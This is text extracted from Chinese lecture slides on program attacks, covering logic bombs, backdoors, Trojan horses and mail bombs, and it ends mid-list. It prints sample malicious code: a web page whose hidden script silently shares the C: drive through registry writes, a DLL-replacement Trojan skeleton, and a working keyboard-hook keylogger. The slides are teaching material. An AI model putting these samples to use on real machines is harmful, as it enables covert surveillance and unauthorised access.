網(wǎng)絡(luò)安全6-程序攻擊

網(wǎng)絡(luò)安全羅敏武漢大學(xué)計(jì)算機(jī)學(xué)院

jsjgfzx@1第5章緩沖區(qū)溢出攻擊回顧緩沖區(qū)溢出攻擊的基本原理、方法緩沖區(qū)溢出程序的原理及要素攻擊UNIX攻擊WINDOWS2第6章程序攻擊本章列出了常用的程序攻擊方法，介紹了邏輯炸彈、后門(mén)、病毒及特洛伊木馬等的概念和特點(diǎn)，并用實(shí)例說(shuō)明工作原理，提供和分析了部分代碼以便更深入地學(xué)習(xí)和了解技術(shù)原理。3第6章程序攻擊6.1邏輯炸彈攻擊6.2

植入后門(mén)6.3

病毒攻擊6.4

特洛伊木馬攻擊6.5

其它程序攻擊4

邏輯炸彈攻擊定義一種隱藏于計(jì)算機(jī)系統(tǒng)中以某種方式觸發(fā)后對(duì)計(jì)算機(jī)系統(tǒng)硬件、軟件或數(shù)據(jù)進(jìn)行惡意破壞的程序代碼觸發(fā)方式時(shí)間觸發(fā)、特定操作觸發(fā)、滿足某一條件的觸發(fā)等第6章第1節(jié)5

邏輯炸彈攻擊特征隱蔽性：邏輯炸彈一般都比較短小，容易附著在系統(tǒng)或文件上而不容易察覺(jué)，也可能被惡意隱藏在一些常用工具軟件代碼中攻擊性：邏輯炸彈都具有攻擊性，一旦被激發(fā)，或是干擾屏幕顯示，或降低電腦運(yùn)行速度，或是刪除程序，破壞數(shù)據(jù)邏輯炸彈沒(méi)有“傳染性”第6章第1節(jié)6

植入后門(mén)定義后門(mén)是計(jì)算機(jī)入侵者攻擊網(wǎng)上其它計(jì)算機(jī)成功后為方便下次進(jìn)入這臺(tái)被攻擊計(jì)算機(jī)而采取的一些欺騙手段和程序目的再次進(jìn)入、不被發(fā)現(xiàn)健壯性第6章第2節(jié)7

植入后門(mén)攻擊方法獲取盡可能多的用戶口令，并不會(huì)被管理員察覺(jué)或查封更改配置例如：rhosts替換程序（包括源代碼，函數(shù)庫(kù)，內(nèi)核）要點(diǎn)：時(shí)間、校驗(yàn)和開(kāi)設(shè)新的服務(wù)，定時(shí)開(kāi)啟服務(wù)第6章第2節(jié)8

植入后門(mén)隱藏代碼：壞扇區(qū)，Boot通訊：TCP，UDP和ICMPShell后門(mén)：TCP/UDP/ICMP第6章第2節(jié)9

植入后門(mén)隱藏執(zhí)行DLLRundll32.exeDllcache動(dòng)態(tài)嵌入掛接API，全局鉤子（HOOK），遠(yuǎn)程線程第6章第2節(jié)10

植入后門(mén)Unix后門(mén)netcatncpbshVetescan后門(mén)軟件http://

第6章第2節(jié)11

病毒攻擊詳見(jiàn)第13章網(wǎng)絡(luò)病毒防治第6章第3節(jié)12

特洛伊木馬攻擊定義特洛伊木馬，簡(jiǎn)稱木馬，英文名為T(mén)rojanhorse計(jì)算機(jī)領(lǐng)域的“特洛伊木馬(Trojan)”，是指附著在應(yīng)用程序中或者單獨(dú)存在的一些惡意程序，它可以利用網(wǎng)絡(luò)遠(yuǎn)程響應(yīng)網(wǎng)絡(luò)另一端的控制程序的控制命令，實(shí)現(xiàn)對(duì)感染木馬程序的計(jì)算機(jī)的控制，或者竊取感染木馬程序的計(jì)算機(jī)上的機(jī)密資料。第6章第4節(jié)13

特洛伊木馬攻擊工作原理木馬程序一般利用TCP/IP協(xié)議，采用C/S結(jié)構(gòu)，分為客戶端和服務(wù)器端兩個(gè)部分服務(wù)器端程序運(yùn)行于被攻擊的計(jì)算機(jī)上，而客戶端程序在控制者的計(jì)算機(jī)上運(yùn)行客戶端程序可以同時(shí)向很多服務(wù)端程序發(fā)送命令以控制這些計(jì)算機(jī)?？蛻舳顺绦蛞话闾峁┯押玫牟僮鹘缑?，以便于用戶的操作，其功能可能很多第6章第4節(jié)14

特洛伊木馬攻擊功能分類遠(yuǎn)程訪問(wèn)型木馬密碼發(fā)送型木馬鍵盤(pán)記錄型木馬毀壞型木馬FTP型木馬第6章第4節(jié)15

特洛伊木馬攻擊通訊分類主動(dòng)型木馬反彈型木馬嵌入式木馬第6章第4節(jié)16

特洛伊木馬攻擊冰河文件瀏覽器屏幕監(jiān)視鍵盤(pán)鼠標(biāo)控制其它控制支持配置glacier第6章第4節(jié)17

特洛伊木馬攻擊反彈型木馬它利用防火墻對(duì)內(nèi)部發(fā)起的連接請(qǐng)求無(wú)條件信任的特點(diǎn)，假冒是系統(tǒng)的合法網(wǎng)絡(luò)請(qǐng)求與木馬的客戶端建立連接，從而達(dá)到對(duì)被攻擊計(jì)算機(jī)控制的目的第6章第4節(jié)18

特洛伊木馬攻擊網(wǎng)絡(luò)神偷遠(yuǎn)程文件訪問(wèn)，而不是遠(yuǎn)程控制反彈端口HTTP隧道服務(wù)器端上線通知功能通訊加密第6章第4節(jié)19

特洛伊木馬攻擊嵌入式木馬嵌入網(wǎng)頁(yè)的共享式木馬<html> <head> <title>共享木馬</title> </head> <script> functionkillErrors() {returntrue;} </script>第6章第4節(jié)20

<scriptlanguage=JScript> document.write("<APPLETHEIGHT=0WIDTH=0code=com.ms.activeX.ActiveXComponent></APPLET>");functionmmain(){try{

aa=document.applets[0]; aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0b}");

aa.createInstance();

commandsh=aa.GetObject();{commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Flags",302,"REG_DWORD");commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Type",0,"REG_DWORD"); commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Path","C:\\");第6章第4節(jié)21

} } catch(e){} } functionstart(){setTimeOut("mmain()",1000);} start(); </script> <bodybgcolor=#FFFFFFtopmargin=0leftmargin=0> <p>你好。。。。。。。</p><p>全世界最好的網(wǎng)頁(yè)</p> </body></html>第6章第4節(jié)22

特洛伊木馬攻擊嵌入式木馬DLL木馬替換系統(tǒng)原有DLL，模仿原有功能，并加入后門(mén)#include<windows.h>#include<stdio.h>#include<winsock.h>voidmuma_thread(){ //生成木馬的服務(wù)器線程

………}//…..必須輸出與原wsock32.dll庫(kù)同樣的函數(shù)第6章第4節(jié)23BOOLWINAPIDllMain(HANDLE

hInst,ULONGulReasonForCall,LPVOIDlpReserved){//裝載原動(dòng)態(tài)庫(kù)if(i==NULL){ i=LoadLibrary(wsock32.dle);}else return1;if(i!=NULL){//取得與原同名函數(shù)地址a=GetProcAddress(I,”send”);send1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;a=GetProcAddress(I,”recv”);recv1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;}第6章第4節(jié)24else return0;………………替換原來(lái)的所有函數(shù)導(dǎo)出，以確保程序運(yùn)行正常。}intPASCALFARsend(SOCKETs,constchar*buf,int

len,intflags){ ……完成send函數(shù)的功能}intPASCALFARrecv(SOCKETs,charFAR*buf,int

len,intflags){ ……完成recv函數(shù)的功能}第6章第4節(jié)25

特洛伊木馬攻擊木馬的實(shí)現(xiàn)技術(shù)自動(dòng)啟動(dòng)技術(shù)隱藏技術(shù)遠(yuǎn)程監(jiān)控技術(shù)

第6章第4節(jié)26

特洛伊木馬攻擊木馬的實(shí)現(xiàn)技術(shù)自動(dòng)啟動(dòng)技術(shù)啟動(dòng)組、win.ini、system.ini、注冊(cè)表第6章第4節(jié)27

特洛伊木馬攻擊木馬的實(shí)現(xiàn)技術(shù)隱藏技術(shù)任務(wù)欄任務(wù)管理器服務(wù)管理器DLL替換遠(yuǎn)程線程第6章第4節(jié)28

特洛伊木馬攻擊木馬的實(shí)現(xiàn)技術(shù)遠(yuǎn)程監(jiān)控技術(shù)對(duì)對(duì)方計(jì)算機(jī)的監(jiān)視包括對(duì)對(duì)方主機(jī)的鼠標(biāo)、鍵盤(pán)以及屏幕顯示甚至網(wǎng)絡(luò)通訊流量流向等的監(jiān)視，也包括對(duì)對(duì)方計(jì)算機(jī)系統(tǒng)信息（包括磁盤(pán)信息、操作系統(tǒng)信息及硬件信息）的搜集

遠(yuǎn)程控制則是攻擊者控制目標(biāo)機(jī)按照自己的意愿在被攻擊計(jì)算機(jī)上運(yùn)行程序或者關(guān)閉對(duì)方的功能，包括控制對(duì)方的鼠標(biāo)、鍵盤(pán)、操作系統(tǒng)，在對(duì)方計(jì)算機(jī)上啟動(dòng)服務(wù)，或者關(guān)閉對(duì)方計(jì)算機(jī)等第6章第4節(jié)29

特洛伊木馬攻擊鍵盤(pán)型木馬extern"C"BOOL_declspec(dllexport)__stdcall

installhook(){ FILE*f1=NULL; f1=fopen("e:\\hook.txt","w"); fclose(f1);

hkb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hins,0); returnTRUE;}第6章第4節(jié)30HHOOK hkb;LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc(int

nCode,WPARAMwParam,LPARAM

lParam){ charch; if(((DWORD)lParam&0x40000000)&&(HC_ACTION==nCode)) {

if((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>=0x2f)&&(wParam<=0x100)) { FILE*f1; f1=fopen("e:\\hook.txt","a+");//打開(kāi)文件

if(wParam==VK_RETURN) {

ch='\n';

fwrite(&ch,1,1,f1);//將鍵盤(pán)按鍵的字母寫(xiě)入文件

}第6章第4節(jié)31

else { BYTEks[256];

GetKeyboardState(ks); WORDw; UINTscan; scan=0;

ToAscii(wParam,scan,ks,&w,0);

ch=char(w);

fwrite(&ch,1,1,f1);//將鍵盤(pán)按鍵的字母寫(xiě)入文件

} fclose(f1); } } LRESULTRetVal=CallNextHookEx(hkb,nCode,wParam,lParam); returnRetVal;}第6章第4節(jié)32BOOL_declspec(dllexport)UnHook(){ BOOLunhooked=UnhookWindowsHookEx(hkb); return unhooked;}//*.h中聲明如下LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc(

int

nCode,WPARAMwParam,LPARAMlParam);extern"C"BOOL_declspec(dllexport)__stdcall

installhook();第6章第4節(jié)33

其它程序攻擊郵件炸彈與垃圾郵件

常用攻擊工具upyours4、KaBoom3、H